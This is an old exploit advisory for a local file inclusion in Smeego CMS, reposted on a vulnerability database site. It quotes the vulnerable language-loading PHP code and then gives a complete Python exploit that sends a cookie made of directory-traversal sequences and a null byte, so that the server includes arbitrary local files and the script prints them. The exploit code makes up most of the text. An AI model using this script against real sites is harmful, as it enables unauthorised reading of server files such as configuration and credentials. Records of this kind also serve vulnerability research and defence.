Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19865
HistoryMay 20, 2008 - 12:00 a.m.

Smeego CMS vulnerability

2008-05-2000:00:00
vulners.com
15
JSON

Smeego CMS Local File Include Exploit

by

0in from Dark-Coders Programming & Security Group

>>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<

#--------------------------------------------------------

Contact: 0in(dot)email[at]gmail(dot)com

#--------------------------------------------------------

Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor

#--------------------------------------------------------

Description:

Smeego is a Content Management System or Portal

System written in PHP and designed to be

easy to install and use. Smeego has a mature code

and comes with cool modules and themes

for you to start your own dynamic and database

driven website. Bla bla Bla […]

-------------------------------------------------------

Script home: http://smeego.com

-------------------------------------------------------

Vuln:

>>>>>> File: mainfile.php <<<<<<<

#if ($display_errors == 1) { // We don't se any errors ;(

@ini_set('display_errors', 1);

#} else {

@ini_set('display_errors', 0);

#}

#if (isset($newlang)) {

if (file_exists("language/lang-".$newlang.".php")) {

setcookie("lang",$newlang,time()+31536000);

include_once("language/lang-".$newlang.".php");

$currentlang = $newlang;

} else {

setcookie("lang",$language,time()+31536000);

include_once("language/lang-".$language.".php");

$currentlang = $language;

}

#} elseif (isset($lang)) {

include_once("language/lang-".$lang.".php");

$currentlang = $lang;

#} else {

setcookie("lang",$language,time()+31536000);

include_once("language/lang-".$language.".php");

$currentlang = $language;

#}

>>>>>> End <<<<<<<

So… We can send Cookie: lang=[lfi]

-------------------------------------------------------

Simple Python Exploit:

#!/usr/bin/python
import sys
import time
import httplib
print '====================================================='
print ' Smeego CMS Local File INclude Exploit '
print ' by '
print ' 0in from Dark-Coders Programming & Security Group! '
print ' http://dark-coders.4rh.eu '
print '====================================================='
try:
target=sys.argv[1]
path=sys.argv[2]
file=sys.argv[3]
except Exception:
print '\nUse: %s [target] [path] [file]' % sys.argv[0]
quit()
i=0
lfi='…/'
target+=":80"
special="%00"
file+=special
for i in range(9):
lfi+="…/"
print '---------------------------------------------------------'
mysock=httplib.HTTPConnection(target)
mysock=httplib.HTTPConnection(target)
mysock.putrequest("GET",path)
mysock.putheader("User-Agent","Billy Explorer v666")
mysock.putheader('Accept', 'text/html')
mysock.putheader('Accept-Language',' en-us,en;q=0.5')
mysock.putheader('Cookie','lang=%s%s' % (lfi,file))
mysock.endheaders()
reply=mysock.getresponse()
print reply.read()
time.sleep(2)
mysock.close()
print '----------------------------------------------------------'

#EOFF

JSON